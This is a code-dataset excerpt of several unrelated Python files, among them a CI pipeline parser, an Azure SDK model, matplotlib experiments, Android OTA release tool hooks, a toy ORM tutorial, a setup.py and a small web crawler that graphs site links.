jvars[pvar]=gvalue\n\n # vars submitted by CI service - e.g. api trigger variables\n for civar, civalue in (self.extract_str_dict(self._forced_variables)).items():\n jvars[civar]=civalue\n\n # Additional injected vars\n for varname, varvalue in injectdict.items():\n jvars[varname]=varvalue\n\n self._cidict[jobname][JOBKEY_VARIABLES] = jvars\n\n # Remove pipeline variables dict so it won't get added again if this gets recalled\n self._cidict.pop(PIPELINEKEY_VARIABLES)\n\n def _pipeline_add_buildinfo(self, CI_COMMIT_REF_NAME, CI_PIPELINE_SOURCE, CI_COMMIT_MESSAGE, CI_COMMIT_SHA, CI_COMMIT_TAG=None):\n \"\"\"\n Distribute information about the repository and what to build from it\n See `prepare` (args forwarded) and GL docs for parameter info\n \"\"\"\n\n pd = {\n # Mark that job is executed in CI environment\n \"CI\": True,\n # Branch or tag name for which project is built\n \"CI_COMMIT_REF_NAME\": CI_COMMIT_REF_NAME,\n # Indicates how the pipeline was triggered. Options include push, web, trigger, schedule, api, pipeline\n \"CI_PIPELINE_SOURCE\": CI_PIPELINE_SOURCE,\n # Full commit message\n \"CI_COMMIT_MESSAGE\": CI_COMMIT_MESSAGE,\n # Commit hash\n \"CI_COMMIT_SHA\": CI_COMMIT_SHA,\n # CI_COMMIT_REF_NAME lowercased, shortened to 63 bytes, and with everything except 0-9 and a-z replaced with -. No leading / trailing -\n \"CI_COMMIT_REF_SLUG\": re.sub('[^0-9a-zA-Z]+', '-', CI_COMMIT_REF_NAME.lower())[:63].strip('-'),\n # The title of the commit - the full first line of the message\n \"CI_COMMIT_TITLE\": CI_COMMIT_MESSAGE.split('\\n')[0],\n # description of the commit: the message without first line, if the title is shorter than 100 characters; full message in other case.\n \"CI_COMMIT_DESCRIPTION\": CI_COMMIT_MESSAGE if len(CI_COMMIT_MESSAGE) < 100 else re.sub(r'^[^\\n]*\\n', '', CI_COMMIT_MESSAGE),\n # flag to indicate that job was triggered (Doesn't include e.g. push events)\n \"CI_PIPELINE_TRIGGERED\": True if CI_PIPELINE_SOURCE in [\"trigger\", \"api\", \"pipeline\", \"schedule\", \"web\"] else False\n }\n if CI_COMMIT_TAG:\n pd[\"CI_COMMIT_TAG\"] = CI_COMMIT_TAG\n self._job_combine_variables(pd)\n\n # Add job variables\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(job, dict):\n jvars=self.extract_str_dict(job[JOBKEY_VARIABLES] if JOBKEY_VARIABLES in job else {})\n jvars[\"CI_JOB_NAME\"] = jobname\n jvars[\"CI_JOB_STAGE\"] = job[JOBKEY_STAGE]\n self._cidict[jobname][JOBKEY_VARIABLES] = jvars\n\n def _evaluate_jobs(self):\n \"\"\"\n Removes all jobs that are not supposed to run\n This does evaluation of variables in |only:| section and removes all jobs whos dependencies are not matched\n \"\"\"\n\n bak_env = os.environ\n jobs_to_remove = []\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(job, dict):\n os.environ = bak_env\n job_run_script = False\n job_run_ref_ok = False\n job_run_ref_variables = len(job[JOBKEY_ONLY][JOBKEY_ONLY_VARIABLES]) == 0\n\n for jvar, jvalue in job[JOBKEY_VARIABLES].items():\n os.environ[jvar]=jvalue\n\n if JOBKEY_SCRIPT in job and job[JOBKEY_SCRIPT]:\n job_run_script = True\n elif JOBKEY_DEPENDENCIES in job and job[JOBKEY_DEPENDENCIES] and JOBKEY_ARTIFACTS in job and job[JOBKEY_ARTIFACTS]:\n job_run_script = True\n\n # No restrictions given\n if not job[JOBKEY_ONLY][JOBKEY_ONLY_REFS] and not job[JOBKEY_ONLY][JOBKEY_ONLY_VARIABLES]:\n job_run_ref_ok = True\n # Only run for triggers\n if \"triggers\" in job[JOBKEY_ONLY][JOBKEY_ONLY_REFS] and job[JOBKEY_VARIABLES][\"CI_PIPELINE_TRIGGERED\"]:\n job_run_ref_ok = True\n # Only run for commits having a tag\n if \"tags\" in job[JOBKEY_ONLY][JOBKEY_ONLY_REFS] and \"CI_COMMIT_TAG\" in job[JOBKEY_VARIABLES]:\n job_run_ref_ok = True\n # Only run for commits having a tag\n for ref in job[JOBKEY_ONLY][JOBKEY_ONLY_REFS]:\n if ref not in [\"tags\",\"triggers\"] and job[JOBKEY_VARIABLES][\"CI_COMMIT_REF_NAME\"] == ref:\n job_run_ref_ok = True\n\n # Evaluate all in variables\n for condition in job[JOBKEY_ONLY][JOBKEY_ONLY_VARIABLES]:\n split = condition.split(\"==\")\n left = os.path.expandvars(split[0].strip().strip('\"'))\n right = os.path.expandvars(split[1]).strip().strip('\"') if len(split) > 1 else None\n\n # For checking compared values\n #print(str(left) + \"<--->\" + str(right))\n\n # 5 Variable presence check\n # - $VARIABLE\n if left and right is None:\n job_run_ref_variables = True\n # 3 Checking for an empty variable\n # - $VARIABLE == \"\"\n elif left and right == \"\":\n job_run_ref_variables = True\n # 2 Checking for an undefined value\n # - $VARIABLE == \"\"\n elif \"$\" in left and right and right in [\"null\",\"nil\",\"None\"]:\n job_run_ref_variables = True\n # 1,4 Equality matching using a string\n # - $VARIABLE == \"Text\"\n # - $VARIABLE == $VARIABLE2\n elif right and left == right:\n job_run_ref_variables = True\n\n job_run = job_run_ref_ok and job_run_ref_variables and job_run_script\n if not job_run:\n jobs_to_remove.append(jobname)\n\n self._cidict = {jobname:job for (jobname,job) in self._cidict.items() if isinstance(jobname,str) and not jobname in jobs_to_remove }\n removedsomething = True\n while removedsomething:\n removedsomething = False\n jobnames = self._cidict.keys()\n for jobname, job in self._cidict.items():\n if jobname not in PIPELINES_KEYS and isinstance(job, dict):\n for dep in job[JOBKEY_DEPENDENCIES]:\n if not dep in jobnames:\n removedsomething = jobname\n break\n if removedsomething:\n self._cidict = {jobname:job for (jobname,job) in self._cidict.items() if isinstance(jobname,str) and not jobname == removedsomething }\n os.environ = bak_env\n\n def _assign_ids(self):\n \"\"\"\n Assigns pipeline and job ids\n \"\"\"\n\n pipeline_id = str(self._id_generator.next_pipeline_id())\n\n # Add job-ids on stage basis, temporarly convert to matrix view for this\n matrix = self.convert_to_matrix()\n for i, stage in enumerate(matrix[MATRIXKEY_STAGES]):\n for jobname, job in matrix[MATRIXKEY_JOBS][i].items():\n jvars=self.extract_str_dict(job[JOBKEY_VARIABLES] if JOBKEY_VARIABLES in job else {})\n jvars[\"CI_PIPELINE_ID\"] = pipeline_id\n jvars[\"CI_JOB_ID\"] = str(self._id_generator.next_job_id())\n self._cidict[jobname][JOBKEY_VARIABLES] = jvars\n\n\ndef get_argument_parser(prog=None):\n import argparse\n parser = argparse.ArgumentParser(prog=prog)\n parser.add_argument('cifile', nargs='?', default='.ci.yml')\n parser.add_argument('--branch', default='master', help='The brach name for which the pipeline was triggered.')\n parser.add_argument('--source', default='trigger', help='Indicates how the pipeline was triggered.')\n parser.add_argument('--ref', default='0'*32, help='The commit ref for which the pipeline was triggered. Defaults to empty SHA.')\n parser.add_argument('--msg', default='No message.', help='Full commit message.')\n parser.add_argument('--tag', help='Commit tag.')\n parser.add_argument('--dump', action='store_true', help='Dump the completed CI configuration.')\n parser.add_argument('--dump-matrix', action='store_true', help='Dump the build matrix.')\n parser.add_argument('--dump-run', action='store_true', help='Dump how a run of the CI file would look like.')\n parser.add_argument('--env', default=[], action='append', help='Define an environment variable.')\n return parser\n\n\ndef main(argv=None, prog=None):\n parser = get_argument_parser(prog)\n args = parser.parse_args(argv)\n\n env = {}\n for item in args.env:\n key, value = item.partition('=')[::2]\n env[key] = value\n\n cifile = CiFile(variables=env)\n cifile.read_cifile(args.cifile)\n cifile.prepare_run_with(args.branch, args.source, args.msg, args.ref, args.tag)\n matrix = cifile.convert_to_matrix()\n\n if args.dump:\n print(yaml.dump(matrix))\n return 0\n\n if args.dump_matrix:\n cifile.print_matrix(matrix)\n return 0\n\n if args.dump_run:\n for i, stagename in enumerate(matrix[MATRIXKEY_STAGES]):\n stage = matrix[MATRIXKEY_JOBS][i]\n print('Stage: {}'.format(stagename))\n for jobname, job in stage.items():\n print(' Job: {}'.format(jobname))\n for cmd in job[JOBKEY_SCRIPT]:\n print(' {}'.format(cmd))\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"flux/cifile.py","file_name":"cifile.py","file_ext":"py","file_size_in_byte":25086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"330228236","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass FileServerCreateParameters(Model):\n \"\"\"Parameters supplied to the Create operation.\n\n All required parameters must be populated in order to send to Azure.\n\n :param location: Required. The region in which to create the File Server.\n :type location: str\n :param tags: The user specified tags associated with the File Server.\n :type tags: dict[str, str]\n :param vm_size: Required. The size of the virtual machine of the file\n server. For information about available VM sizes for fileservers from the\n Virtual Machines Marketplace, see Sizes for Virtual Machines (Linux).\n :type vm_size: str\n :param ssh_configuration: Required. SSH configuration for the file server.\n :type ssh_configuration: ~azure.mgmt.batchai.models.SshConfiguration\n :param data_disks: Required. Settings for the data disk which would be\n created for the file server.\n :type data_disks: ~azure.mgmt.batchai.models.DataDisks\n :param subnet: Specifies the identifier of the subnet.\n :type subnet: ~azure.mgmt.batchai.models.ResourceId\n \"\"\"\n\n _validation = {\n 'location': {'required': True},\n 'vm_size': {'required': True},\n 'ssh_configuration': {'required': True},\n 'data_disks': {'required': True},\n }\n\n _attribute_map = {\n 'location': {'key': 'location', 'type': 'str'},\n 'tags': {'key': 'tags', 'type': '{str}'},\n 'vm_size': {'key': 'properties.vmSize', 'type': 'str'},\n 'ssh_configuration': {'key': 'properties.sshConfiguration', 'type': 'SshConfiguration'},\n 'data_disks': {'key': 'properties.dataDisks', 'type': 'DataDisks'},\n 'subnet': {'key': 'properties.subnet', 'type': 'ResourceId'},\n }\n\n def __init__(self, **kwargs):\n super(FileServerCreateParameters, self).__init__(**kwargs)\n self.location = kwargs.get('location', None)\n self.tags = kwargs.get('tags', None)\n self.vm_size = kwargs.get('vm_size', None)\n self.ssh_configuration = kwargs.get('ssh_configuration', None)\n self.data_disks = kwargs.get('data_disks', None)\n self.subnet = kwargs.get('subnet', None)\n","sub_path":"azure-mgmt-batchai/azure/mgmt/batchai/models/file_server_create_parameters.py","file_name":"file_server_create_parameters.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"28204404","text":"\n# coding: utf-8\n\n# In[3]:\n\n\nimport matplotlib.pyplot as plt \n\n# x axis values \nx = [1,2,3] \n# corresponding y axis values \ny = [2,4,1] \n\n# plotting the points \nfor i in range(10):\n for j in range(3):\n x[j]=x[j]+1\n y[j]=y[j]+1\n plt.plot(x, y) \n\n# naming the x axis \n plt.xlabel('x - axis') \n# naming the y axis \n plt.ylabel('y - axis') \n\n# giving a title to my graph \n plt.title('My first graph!') \n\n# function to show the plot \nplt.show() \n\n\n# In[9]:\n\n\nimport matplotlib.pyplot as plt\nimport time\nimport random\n \nysample = random.sample(range(-50, 50), 100)\n \nxdata = []\nydata = []\n \n#plt.show()\n \naxes = plt.gca()\naxes.set_xlim(0, 100)\naxes.set_ylim(-50, +50)\nline, = axes.plot(xdata, ydata, 'r-')\n \nfor i in range(100):\n xdata.append(i)\n ydata.append(ysample[i])\n line.set_xdata(xdata)\n line.set_ydata(ydata)\n plt.draw()\n plt.pause(1e-17)\n time.sleep(0.1)\n \n# add this if you don't want the window to disappear at the end\n #plt.show()\n\n\n# In[10]:\n\n\nimport matplotlib.pyplot as plt\n# generate axes object\nax = plt.axes()\n\n# set limits\nplt.xlim(0,10) \nplt.ylim(0,10)\n\nfor i in range(10): \n # add something to axes \n ax.scatter([i], [i]) \n ax.plot([i], [i+1], 'rx')\n\n # draw the plot\n plt.draw() \n plt.pause(0.01) #is necessary for the plot to update for some reason\n\n # start removing points if you don't want all shown\n if i>2:\n ax.lines[0].remove()\n\n","sub_path":"graph_test.py","file_name":"graph_test.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"597046614","text":"\nimport common\nimport edify_generator\n\ndef RemoveDeviceAssert(info):\n edify = info.script\n edify.AppendExtra(\"\"\"ui_print(\"Complete by hehua2008...\");\nui_print(\"...bbs.tclmobile.com.cn...\");\"\"\")\n for i in xrange(len(edify.script)):\n if \"ro.product\" in edify.script[i]:\n edify.script[i] = \"\"\"ui_print(\"****************************\");\nui_print(\"* TCL S960 *\");\nui_print(\"* BaiduROM *\");\nui_print(\"* 14.07.17 *\");\nui_print(\"* by hehua2008 *\");\nui_print(\"* bbs.tclmobile.com.cn *\");\nui_print(\"****************************\");\nui_print(\"Removing custpack bootanimation & JRD_custres...\");\nmount(\"ext4\", \"EMMC\", \"/dev/block/mmcblk0p5\", \"/custpack\");\ndelete(\"/custpack/JRD_custres/media/bootanimation.zip\");\ndelete_recursive(\"/custpack/app\",\n \"/custpack/JRD_custres\");\nunmount(\"/custpack\");\"\"\"\n return\n\ndef AddArgsForFormatSystem(info):\n edify = info.script\n for i in xrange(len(edify.script)):\n if \"format(\" in edify.script[i] and \"mmcblk0p7\" in edify.script[i]:\n edify.script[i] = 'format(\"ext4\", \"EMMC\", \"/dev/block/mmcblk0p7\", \"0\", \"/system\");'\n return\n\ndef WriteRecoveryImage(info):\n edify = info.script\n for i in xrange(len(edify.script)):\n if \"write_raw_image(\" in edify.script[i]:\n edify.script[i] = 'package_extract_file(\"recovery.img\", \"/dev/recovery\");'\n return\n\ndef RemoveRecoveryImage(info):\n edify = info.script\n for i in xrange(len(edify.script)):\n if \"recovery\" in edify.script[i]:\n edify.script[i] = 'ui_print(\"Remove update recovery script written automatically by Baidu\");'\n return\n\ndef FullOTA_InstallEnd(info):\n RemoveDeviceAssert(info)\n AddArgsForFormatSystem(info)\n RemoveRecoveryImage(info)\n# WriteRecoveryImage(info)\n\ndef IncrementalOTA_InstallEnd(info):\n RemoveDeviceAssert(info)\n RemoveRecoveryImage(info)\n# WriteRecoveryImage(info)\n\n","sub_path":"releasetools.py","file_name":"releasetools.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"55981702","text":"\"\"\"\nORM全称\"Object Relational Mapping\",即对象-关系映射(map),就是把关系数据库的一行映射为一个对象,也就是一个类对应一个表,这样,\n写代码更简单,不用直接操作SQL语句.\n要编写一个ORM框架,所有的类都只能动态定义,因为只有使用者才能根据表的结构定义出对应的类来.\n让我们尝试编写一个ORM框架.\n编写底层模块的第一步,就是先把调用接口写出来.比如,使用者如果使用这个ORM框架,想定义一个User类来操作对应的数据库表User,我们期待他写出这样的代码:\n\"\"\"\n\n\n# class User(Model):\n# # 定义类的属性到类的映射\n# id = InterField('id')\n# name = StringField('name')\n# email = StringField('email')\n# password = StringField('password')\n#\n#\n# # 创建一个实例:\n# u = User(id=12345, name='Michael', email='test@orm.org', password='my-pwd')\n# # 保存到数据库:\n# u.save()\n\"\"\"\n其中,父类Model和属性类型StringField,IntegerField是由ORM框架提供的,剩下的魔术方法比如save()全部由metaclass自动完成.虽然metaclass的编写会比较复杂,但ORM的使用者用起来却异常简单.\n现在我们就按照上面的接口来实现该ORM.\n\"\"\"\n\n\n# 首先定义Field类,它负责保存数据库表的字段名和字段类型:\nclass Field(object):\n\n def __init__(self, name, column_type):\n self.name = name\n self.column_type = column_type\n\n def __str__(self):\n return '<%s:%s>' % (self.__class__.__name__, self.name)\n\n\n# 在Field的基础上,进一步定义各种类型的Field,比如StringField,IntegerField等待:\nclass StringField(Field):\n\n def __init__(self, name):\n super(StringField, self).__init__(name, 'varchar(100)')\n\n\nclass IntegerField(Field):\n\n def __init__(self, name):\n super(IntegerField, self).__init__(name, 'bigint')\n\n\n# 下一步,就是编写最复杂的ModelMetaclass了:\nclass ModelMetaclass(type):\n\n def __new__(cls, name, bases, attrs):\n if name == 'Model':\n return type.__new__(cls, name, bases, attrs)\n print('Found model: %s' % name)\n mappings = dict()\n for k, v in attrs.items():\n if isinstance(v, Field):\n print('Found mapping: %s ==> %s' % (k, v))\n mappings[k] = v\n for k in mappings.keys():\n attrs.pop(k)\n attrs['__mappings__'] = mappings # 保存属性和列的映射关系\n attrs['__table__'] = name # 假设表名和类名一致\n return type.__new__(cls, name, bases, attrs)\n\n\n# 以及基类Model:\nclass Model(dict, metaclass=ModelMetaclass):\n\n def __init__(self, **kw):\n super(Model, self).__init__(**kw)\n\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError:\n raise AttributeError(r\"'Model' object has no attribute '%s'\" % key)\n\n def __setattr__(self, key, value):\n self[key] = value\n\n def save(self):\n fields = []\n params = []\n args = []\n for k, v in self.__mappings__.items():\n fields.append(v.name)\n params.append('?')\n args.append(getattr(self, k, None))\n sql = 'insert into %s (%s) values (%s)' % (self.__table__, ','.join(fields), ','.join(params))\n print('SQL: %s' % sql)\n print('ARGS: %s' % str(args))\n\n\n\"\"\"\n当用户定义一个class User(Model)时,Python解释器首先在当前类User的定义中查找metaclass,如果没有找到,就继续在父类Model中查找metaclass,找到了,就使用Model中定义的metaclass的ModelMetaclass来创建User类,也就是说,metaclass可以隐式地继承到子类,但子类自己却感觉不到.\n在ModelMetaclass中,一共做了几件事情:\n1.排除掉队Model类的修改;\n2.在当前类(比如User)中查找定义的类的所有属性,如果找到以Field属性,就把它保存到一个__mappings__的dict中,同时从类属性中删除该Field属性,否则,容易造成运行时错误(实例的属��会遮盖类的同名属性);\n3.把表名保存到__table__中,这里简化为表明默认为类名.\n在Model类中,就可以定义各种操作数据库的方法,比如save(),delete(),find(),update等等.\n我们实现了save()方法,把一个实例保存到数据库中,因为有表名,属性到字段的映射和属性值的集合,就可以构造出INSERT语句\n\"\"\"\n\n\nclass User(Model):\n # 定义类的属性到类的映射\n id = IntegerField('id')\n name = StringField('name')\n email = StringField('email')\n password = StringField('password')\n\n\n# 创建一个实例:\nu = User(id=12345, name='Michael', email='test@orm.org', password='my-pwd')\n# 保存到数据库:\nu.save()\n\"\"\"\n可以看到,save(方法已经打印出了可执行的语句,以及参数列表,只需要真正连接到数据库,执行该SQL语句,就可以完成真正的功能)\n\"\"\"","sub_path":"chapter07/MyORM.py","file_name":"MyORM.py","file_ext":"py","file_size_in_byte":4865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"585537783","text":"from ...typecheck import *\nfrom ...import core\nimport sublime\n\ndef _expand_variables_and_platform(json: dict, variables: Optional[dict]) -> dict:\n\tplatform = None #type: Optional[dict]\n\tif core.platform.osx:\n\t\tplatform = json.get('osx')\n\telif core.platform.linux:\n\t\tplatform = json.get('linux')\n\telif core.platform.windows:\n\t\tplatform = json.get('windows')\n\n\tif platform:\n\t\tjson = json.copy()\n\t\tfor key, value in platform.items():\n\t\t\tjson[key] = value\n\n\tif variables is not None:\n\t\treturn sublime.expand_variables(json, variables)\n\n\treturn json\n\n\nclass Configuration:\n\tdef __init__(self, name: str, index: int, type: str, request: str, all: dict) -> None:\n\t\tself.name = name\n\t\tself.id_ish = f'configuration_{name}_{index}'\n\t\tself.type = type\n\t\tself.request = request\n\t\tself.all = all\n\n\t@staticmethod\n\tdef from_json(json: dict, index: int) -> 'Configuration':\n\t\tname = json.get('name')\n\t\tassert name, 'expecting name for debug.configuration'\n\t\ttype = json.get('type')\n\t\tassert type, 'expecting type for debug.configuration'\n\t\trequest = json.get('request')\n\t\tassert request, 'expecting request for debug.configuration'\n\t\treturn Configuration(name, index, type, request, json)\n\nclass ConfigurationExpanded(Configuration):\n\tdef __init__(self, configuration: Configuration, variables: Any) -> None:\n\t\tall = _expand_variables_and_platform(configuration.all, variables)\n\t\tsuper().__init__(configuration.name, -1, configuration.type, configuration.request, all)\n\t\tself.verify()\n\n\tdef verify(self):\n\t\tdef warn(text: str):\n\t\t\tsublime.error_message(text)\n\n\t\tdef error(text: str):\n\t\t\traise core.Error(text)\n\n\t\tif self.type == \"python\":\n\t\t\tif self.request == \"launch\":\n\t\t\t\tif not self.all.get(\"program\"):\n\t\t\t\t\twarn(\"Warning: Check your debugger configuration.\\n\\nField `program` in configuration is empty. If it contained a $variable that variable may not have existed.\"\"\")\n\t\t\treturn\n\nclass ConfigurationCompound:\n\tdef __init__(self, name: str, index: int, configurations: List[str]) -> None:\n\t\tself.name = name\n\t\tself.id_ish = f'compound_{name}_{index}'\n\t\tself.configurations = configurations\n\n\t@staticmethod\n\tdef from_json(json: dict, index: int) -> 'ConfigurationCompound':\n\t\tname = json.get('name')\n\t\tassert name, 'expecting name for debug.compound'\n\t\tconfigurations = json.get('configurations')\n\t\tassert configurations, 'expecting configurations for debug.compound'\n\t\treturn ConfigurationCompound(name, index, configurations)","sub_path":"modules/debugger/adapter/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"236058750","text":"from human_pose import HumanPose, visual_pose,transform_from_ai, transform_to_json\nimport json\nimport cv2\nfrom easydict import EasyDict as edict\nimport pylab as plt\nimport pdb\ndef main():\n\n cfg = edict()\n cfg.data_path = 'ai_challenger_keypoint_validation_20170911'\n cfg.image_path = 'keypoint_validation_images_20170911'\n cfg.ann_file = 'keypoint_validation_annotations_20170911.json'\n dataset = HumanPose(cfg.data_path+'/'+cfg.image_path,cfg.data_path+'/'+cfg.ann_file) \n img_file = dataset.image_file_at(0)\n img = cv2.imread(img_file)\n keypoints, humans = dataset.keypoint_human_at(0)\n pdb.set_trace()\n for i in range(keypoints.shape[0]):\n ai_pose = keypoints[i].reshape((-1,3))\n coco_pose = transform_from_ai(ai_pose)\n json_pose = transform_to_json(coco_pose)\n visual_pose(img,json_pose.reshape(-1))\n cv2.rectangle(img,tuple(humans[i][:2]),tuple(humans[i][2:]),(255,0,0),2)\n plt.imshow(img[:,:,::-1])\n plt.show()\n\nif __name__ == '__main__':\n main()\n","sub_path":"dataset_api/ai_challenger/toolbox/test_tranorform.py","file_name":"test_tranorform.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"537275912","text":"#!/usr/bin/env python\n# vim:fileencoding=utf-8\n# License: Apache 2.0 Copyright: 2017, Kovid Goyal \n\nimport os\nimport sys\nfrom distutils.command.build import build as Build\nfrom itertools import chain\n\nfrom setuptools import Extension, setup\n\nself_path = os.path.abspath(__file__)\nbase = os.path.dirname(self_path)\nsys.path.insert(0, base)\nif True:\n from build import (\n SRC_DIRS, find_c_files, include_dirs, libraries, library_dirs, version, iswindows,\n TEST_COMMAND, add_python_path)\ndel sys.path[0]\n\nsrc_files = tuple(chain(*map(lambda x: find_c_files(x)[0], SRC_DIRS)))\ncargs = ('/O2' if iswindows else '-O3').split()\nif not iswindows:\n cargs.extend('-std=c99 -fvisibility=hidden'.split())\n\n\nclass Test(Build):\n\n description = \"run unit tests after in-place build\"\n\n def run(self):\n Build.run(self)\n if self.dry_run:\n self.announce('skipping \"test\" (dry run)')\n return\n import subprocess\n env = add_python_path(os.environ.copy(), self.build_lib)\n print('\\nrunning tests...')\n sys.stdout.flush()\n ret = subprocess.Popen([sys.executable] + TEST_COMMAND, env=env).wait()\n if ret != 0:\n raise SystemExit(ret)\n\n\nCLASSIFIERS = \"\"\"\\\nDevelopment Status :: 5 - Production/Stable\nIntended Audience :: Developers\nLicense :: OSI Approved :: Apache Software License\nNatural Language :: English\nOperating System :: OS Independent\nProgramming Language :: Python\nTopic :: Text Processing\nTopic :: Text Processing :: Markup\nTopic :: Text Processing :: Markup :: HTML\nTopic :: Text Processing :: Markup :: XML\n\"\"\"\n\nsetup(\n name='html5-parser',\n version='{}.{}.{}'.format(*version),\n author='Kovid Goyal',\n author_email='redacted@acme.com',\n description='Fast C based HTML 5 parsing for python',\n license='Apache 2.0',\n url='https://html5-parser.readthedocs.io',\n download_url=(\n \"https://pypi.python.org/packages/source/m/html5-parser/\"\n \"html5-parser-{}.{}.{}.tar.gz\".format(*version)),\n classifiers=[c for c in CLASSIFIERS.split(\"\\n\") if c],\n platforms=['any'],\n install_requires=['chardet', 'lxml>=3.8.0'],\n extras_require={'soup': 'beautifulsoup4'},\n packages=['html5_parser'],\n package_dir={'': 'src'},\n cmdclass={'test': Test},\n ext_modules=[\n Extension(\n 'html5_parser.html_parser',\n include_dirs=include_dirs(),\n libraries=libraries(),\n library_dirs=library_dirs(),\n extra_compile_args=cargs,\n sources=list(map(str, src_files)))])\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"35237625","text":"import csv\nimport pandas as pd\nimport numpy as np\n\n# def shannon_index(output_file, row):\n# # Filter 0 out of the row since it might cause log 0\n# row = np.array(filter(lambda x: x != 0, row))\n# # print(row)\n# P_i = row/row.sum()\n# # print(P_i)\n# shannon_index = -np.sum(P_i * np.log(P_i))\n\n# f = open(output_file, \"a\")\n# f.write(str(shannon_index))\n# f.write('\\n')\n# f.close()\n# return shannon_index\n\n# row = np.array([5, 9, 20, 0, 21, 30], dtype='float')\n# shannon_index(\"shannon.txt\", row)\n\ndef shannon_index(row):\n # Filter 0 out of the row since it might cause log 0\n row = np.array(filter(lambda x: x != 0, row))\n # print(row)\n P_i = row/row.sum()\n # print(P_i)\n shannon_index = -np.sum(P_i * np.log(P_i))\n return shannon_index\n\n\ndata = pd.read_csv('China_Jeju.an.shared', sep='\\t')\ndata = data.values\n\nf = open(\"shannon_output.txt\", \"a\")\nfor r in range(data.shape[0]):\n # Calculate correlation coefficient\n shannon = shannon_index(data[r, 3:].astype(float))\n\n # Output to a file\n f.write(str(shannon))\n f.write('\\n')\nf.close()\n","sub_path":"shannon_index.py","file_name":"shannon_index.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"218995022","text":"# -*- coding: utf-8 -*-\nimport threading\nimport json\nimport time\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urljoin\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom networkx.readwrite import json_graph\nfrom random import random\n \n\nclass Crawler(threading.Thread):\n '''\n pagemap = {'page root'}\n '''\n def __init__(self, url):\n super(Crawler, self).__init__()\n self._stop_crawler_scheduler= threading.Event()\n self.base_url = url\n self.pagemap = {}\n self.visited = []\n self.G = nx.Graph()\n\n def init_search(self):\n # inicializa criando primeira thread mãe\n # define pagina mãe\n \n self.crawler_scheduler(self.base_url)\n time.sleep(5)\n self._draw_temp()\n #time.sleep(10)\n #self._draw_graph()\n\n def _get_html_code(self, url):\n try:\n code = requests.get(url)\n return code.text\n except:\n raise(\"Wating for connection\")\n \n\n\n def _draw_temp(self):\n\n # position is stored as node attribute data for random_geometric_graph\n pos = nx.spring_layout(self.G,k=0.20,iterations=20)\n colors = [(random(), random(), random()) for _i in list(self.G.nodes())]\n print(colors)\n \n \n # find node near center (0.5,0.5)\n dmin = 1\n ncenter = 0\n for n in pos:\n x, y = pos[n]\n d = (x - 0.5)**2 + (y - 0.5)**2\n if d < dmin:\n ncenter = n\n dmin = d\n \n \n plt.figure(figsize=(8, 8))\n nx.draw_networkx_edges(self.G, pos, nodelist=[ncenter], alpha=0.4)\n nx.draw_networkx_nodes(self.G, pos, nodelist=list(self.G.nodes()),\n node_size=80,\n node_color=colors,\n with_labels=True,\n cmap=plt.cm.Reds_r)\n\n \n #plt.xlim(0, 2.05)\n #plt.ylim(-0.10, 2.05)\n #plt.axis('off')\n plt.show()\n \n def _draw_graph(self):\n \n #data = json_graph.node_link_data(self.G)\n #print(json.dumps(data1))\n #print(self.pagemap, \"\\n\")\n #try:\n # with open('personal.json', 'w') as json_file: \n # json.dump(data, json_file)\n #except:\n # pass\n\n colors = range(84)\n options = {\n 'node_size': 75,\n 'width': 0.5,\n 'with_labels': True,\n 'font_size': 8,\n 'line_size': 2,\n }\n\n \n pos = nx.spring_layout(self.G) \n plt.figure(figsize=(10,10))\n \n nx.draw(self.G,pos, edge_color=colors, edge_cmap=plt.cm.Blues, **options)\n #plt.savefig(\"graph.png\")\n plt.show()\n\n\n def crawler_scheduler(self, page):\n \n page_list = []\n leaf_map = {}\n leaf_map[page] = {}\n \n\n try:\n c = urlopen(page)\n except Exception as e:\n print(\"Could not open %s\" % e)\n return\n \n soup = BeautifulSoup(c.read(), \"html.parser\")\n links = soup('a') #finding all the sub_links\n \n for link in links:\n if 'href' in dict(link.attrs):\n url = urljoin(page, link['href'])\n if url.find(\"'\") != -1:\n continue\n url = url.split('#')[0]\n\n if self.base_url in url and page != url:\n if url[0:4] == 'http':\n page_list.append(url)\n \n if page_list:\n self.G.add_nodes_from(page_list)\n self.pagemap.update({\"{}\".format(page): page_list})\n \n for p in page_list:\n self.G.add_edge(page, p)\n\n for p in page_list:\n if p not in self.visited:\n th = threading.Thread(target=self.crawler_scheduler,\n args=(p,))\n th.start()\n self.visited.append(p)\n\nif __name__ == \"__main__\":\n c = Crawler(\"https://elixir-lang.org/\")\n 